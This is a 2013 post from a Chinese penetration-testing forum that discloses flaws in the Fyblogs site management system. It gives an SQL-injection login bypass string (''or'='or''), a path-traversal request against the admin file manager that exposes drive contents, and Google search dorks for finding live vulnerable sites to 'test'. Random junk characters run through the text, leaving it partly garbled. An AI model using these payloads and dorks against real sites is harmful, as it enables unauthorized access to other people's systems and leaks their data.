中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
7 \$ D9 o$ k3 \* r$ h  _, h& O, T" E& x8 ^
简要描述:
) n6 x! g3 [4 i; w! z( o
- P  _/ u4 y+ E5 F- g/ L7 H" [Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!1 b1 u; c* K7 _1 s  Z
: \4 j% y* Y5 a( w
详细说明:  c1 N' ?) R) D& t9 k) W
+ S* Q! |; b& r1 p' v
后台万能密码 'or'='or'% N" r' I# O- I. _/ J
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!+ F  Q8 f" b0 h) ~
admin/uploadfile.asp?currentFolder=/upfiles/../
! v7 v% l# q9 @# k
/ S% `7 m1 S6 v) K: j* ?7 _漏洞证明:5 K1 e9 [9 V8 ]( C# {) G$ J
$ l3 X  _' \' V+ h- Q
谷歌:inurl:type.asp?id=1 新闻中心
( S) u0 N/ ]2 C* S% ?) A% h) e或者 :inurl:download_ok.asp?
! ^. i6 y% U( ~+ Q; y) o: ^: b! X1 l) i- Q
可以测试7 k. t% R6 S: l& |- V% i. w

6 J  d: m+ M1 s6 g) i# V9 d1 `/ {9 p6 l& ]' r& L





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2